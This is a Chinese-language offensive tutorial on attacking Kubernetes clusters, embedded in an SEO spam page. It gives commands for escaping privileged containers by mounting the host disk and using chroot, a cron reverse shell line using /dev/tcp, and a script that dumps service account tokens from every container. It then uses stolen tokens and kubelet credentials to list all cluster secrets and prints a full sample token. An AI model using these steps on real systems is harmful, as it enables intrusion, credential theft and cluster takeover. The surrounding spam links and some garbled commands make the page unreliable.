当前位置: 首页 > wzjs >正文

松原做网站广告联盟平台挂机赚钱

松原做网站,广告联盟平台挂机赚钱,网站建网站,哪些b2b网站做游戏机比较好文章目录 思路知识补充横向移动Docker逃逸子节点未授权访问的k8s 逃逸pod文件配置如下 **开启特权模式在容器内挂载宿主机的根文件系统**查看宿主机文件查看宿主机的文件内容查看该容器在哪个子节点 票据越权查看是否为子节点基于节点校验权限基于服务账户鉴权 情景一 子节点do…

文章目录

    • 思路
    • 知识补充
    • 横向移动
        • Docker逃逸
        • 子节点
        • 未授权访问的k8s
      • 逃逸
        • pod文件配置如下
      • **开启特权模式在容器内挂载宿主机的根文件系统**
        • 查看宿主机文件
        • 查看宿主机的文件内容
        • 查看该容器在哪个子节点
      • 票据越权
        • 查看是否为子节点
        • 基于节点校验权限
        • 基于服务账户鉴权
      • 情景一 子节点docker进入容器 或get doker shell 目录为可以挂载或者已经挂载 宿主机目录(特权模式)
        • 查看是否处于容器内部
        • 查看是否为特权模式
        • /\*挂载\*/
        • 获取宿主机文件共享shell
        • 横向移动
          • 在docker宿主机中查看 k8s权限
        • 获取子节点容器中的token
          • 脚本
        • 测试token

思路

拿到容器shell 进行docker逃逸横向移动拿到privileged 提权到子节点再去搞k8s集权里的pod 找高权限token

知识补充

kubectl 权限限制是很安全的 主节点master节点可以执行kubectl 但子节点不可以

子节点可以控制docker
在这里插入图片描述

dockerenv 文件为docker环境

在域渗透中利用hash进行不断的hash传递一直找到一个更高权限的hash

在k8s中利用token横向移动直到找到一个有高权限服务账户的token

横向移动

Docker逃逸

docker和容器本身是很安全的包括k8s如果开启了privilege模式或者部署的是很老的操作系统,因为容器会内部共享一些东西,挂载目录时是使用的高权限目录也会导致docker逃逸,脏牛提权

根据逃逸或者横向 直到某个子节点

子节点

直接在服务器上面抓去信息,然后越权,看本地能够访问到哪些pod,或者从docker容器中去访问,能够访问到的内部正在运行的容器,因为可以命令执行,看有没有高权限的token

通过kubectl 查看能执行什么命令 进去后将容器内部的token 拿出来

在k8s中 容器或者pod内部可以存放高权限用户的服务账户

找高权限token

未授权访问的k8s

api server 未授权可以接管集群

逃逸

前提条件需要特权模式 privilege模式

pod文件配置如下

在这里插入图片描述

将宿主机的目录全部挂载到容器的目录下,容器可以操作宿主机的目录导致越权

遇到这种情况直接挂载系统盘

开启特权模式在容器内挂载宿主机的根文件系统

在上述命令启动的容器中,运行以下命令来挂载宿主机的根文件系统

mkdir  /privmount -t ext4  /dev/vda0 /priv

将宿主机的目录映射到容器目录下

查看宿主机文件
kubectl exec 容器名 --ls -alt /priv/root 
查看宿主机的文件内容
kubectl exec 容器名 -- cat /priv/root/.bash_history
查看该容器在哪个子节点
kubectl get pods -o wide

在这里插入图片描述

票据越权

在每个子节点用户在他root根目录中都有一个票据

基于票据越权

查看是否为子节点
docker ps | grep apiserver

在这里插入图片描述

基于节点校验权限
cat /etc/kubernetes/kubelet.conf

查看user关键字 如果是default-auth就是普通权限

如果是system-node就是集群高权限

master节点

在这里插入图片描述

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

node子节点

在这里插入图片描述

基于服务账户鉴权

基于RBAC去分配服务权限

在这里插入图片描述

情景一 子节点docker进入容器 或get doker shell 目录为可以挂载或者已经挂载 宿主机目录(特权模式)

查看是否处于容器内部

1.命令残缺

2.拥有.dockerevn

查看是否为特权模式
cat /proc/self/status | grap -qi '0000003fffffffff' && echo 'Is privileged mode' || echo 'Not privileged mode'

查看/proc/self/status文件中是否有0000003fffffffff 如果有为特权模式

/*挂载*/
mkdir  /priv
df -h 
mount -t ext4 /dev/vda0 /priv

df -h 查看所有盘符挂载最大的一半就是主分区

在这里插入图片描述

docker环境中 查看挂载的目录

ls /priv

在这里插入图片描述

可以访问宿主机目录时使用chroot命令更改docker的工作目录

chroot /priv /bin/bash
或
chroot /priv sh
获取宿主机文件共享shell
  1. 用户添加用户
  2. /var/spool/cron/crontabs 计划任务反弹shell
    • */1 * * * * sh -i >& /dev/tcp/ip/port >&
横向移动
在docker宿主机中查看 k8s权限
cat /kubelet.conf/.kube/config
或者
cat /etc/kubernetes/kubelet.conf#子节点执行

在这里插入图片描述

将该文件复制到当前目录方便操作

cp /etc/kubernetes/kubelet.conf ./

检测自身权限

kubectl --kubeconfig kubelet.conf get pods #查看该权限可以运行的命名空间
kubectl --kubeconfig kubelet.conf get pods --all-namespaces # 查看master节点的命名空间
kubectl get secrets --all-namespaces 
netstat -antp | grep apis

在这里插入图片描述

在这里插入图片描述

获取子节点容器中的token

进入容器

kubectl exec pod -- cmd
或
docker exec -it 容器名

token存放位置

cat /var/run/secrets/kubernetes.io/serviceaccount/token

在这里插入图片描述

脚本
#!/bin/bash
# 提取所有容器ID 
docker ps -q | while read -r container_id; doecho "===容器ID:$container_id ==="token=$(docker exec "$container_id" cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)if [ $? -eq 0 ]; thenecho "Token 内容:"echo  "$token"elseecho "错误:  无法获取Token 或 文件不存在"fiecho -e "\n==========================================="
done
测试token

查询master节点的serverapi接口

netstat -antp | grep 6443

通过token进行测试权限

kubectl --insecure-skip-tls-verify=true --server="https://ip:6443/" --
token="获取的token" get secrets --all-namespaces

kubectl --insecure-skip-tls-verify=true --server="https://192.168.80.135:6443/" --
token="eyJhbGciOiJSUzI1NiIsImtpZCI6Ikx1Q3FMS1J2bXcwRlA0RGg3Z1NVMDhhOFc0Ri1WWFI5S2F
JbF9kRExTMzQifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby
9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNj
b3VudC9zZWNyZXQubmFtZSI6ImhpZ2gtcHJpdmlsZWdlLXNhLXRva2VuLTd2NnZnIiwia3ViZXJuZXRlcy
5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImhpZ2gtcHJpdmlsZWdlLXNhIiwi
a3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiZWViYzU2NWEtN2
Q0Ni00MDI5LTkxNDEtYjBiNDkwMDcyNWNlIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1
bHQ6aGlnaC1wcml2aWxlZ2Utc2EifQ.p2MDu_0kyAvreU_doDGpAamwkw1_utE-HSbFpVdlCIbo-
1gDdjTt7iVIGtfN5N4SYZ27UEy9CjQhEz7t_q61XUY23R1D4nehfOYvAcjDXNUhuPRoadDY9R1CwdbDZYs
ZuKSu46x88mWAtM5kHnYFVZz_tvVPUlZ-FCETlcn0NG8sBDPVjnJVxto3UxwaoMPW9mQUnAma7Zq7MhTDbD20EzfJ2HeZWeWe-
5j3ToGpfovSDmtdd4mp96qUAayGWVCxrHJKLrkg2edyAo2lP53kcU8UTOMeKR57UXMfy8RTix9kWvWd8Qr
OrTPBjTaU1qOlvyaJgLMnhI7K4jIgc0cXQ" get secrets --all-namespaces

默认kubectl子节点权限

kubectl --kubeconfig ./kubelet.conf get secert --all-namespaces kubectl --kubeconfig ./kubelet.conf get pods --all-namespaces
http://www.dtcms.com/wzjs/370067.html

相关文章:

  • 宁波建设网站价格谷歌seo网络公司
  • 安庆专业网站建设公英文外链seo兼职
  • 网站后台框架下载app开发费用标准
  • 政府网站建设一头连着万网域名注册官网查询
  • 杭州网站建设制作公司竞价推广怎样管理
  • 90后做网站网络营销工作内容和职责
  • 网站建设的教材国外搜索引擎大全不屏蔽
  • 做租房网站seo推广怎么入门
  • 国外b2b网站导航外贸网站推广优化
  • 端 传媒网站模板百度关键词查询工具
  • 海南搜索引擎优化北京seo全网营销
  • 上市公司网站建设品牌全案营销策划
  • wordpress注册无法设置密码seo引擎优化专员
  • 做英文版网站免费站推广网站2022
  • 西安网站建设官网怎样通过网络销售自己的产品
  • 加强县政府网站建设网站友情链接出售
  • 施工企业安全生产评价标准最新版2021淘宝关键词排名优化
  • 用什么软件可以做网站线上销售水果营销方案
  • 天津网站建设技术支持杭州网络推广公司
  • 东莞好的网页设计培训试听如何做网站搜索引擎优化
  • 辽阳建设网站搜索指数的数据来源
  • 办公室装修专业网站站长统计ios
  • 做一个网站怎么做的国产免费crm系统有哪些在线
  • 网站建设现在什么服务器比较好网推公司干什么的
  • 创建网页需要多少钱石家庄谷歌seo
  • 北京网站优化经理关键词优化排名首页
  • 做网站需要的服务器如何在网站上推广自己的产品
  • 网站做推广需要什么条件武汉seo公司排名
  • 两个网站链接如何做怎么恶意点击对手竞价
  • wordpress网站如何播放视频播放器怎么快速优化关键词排名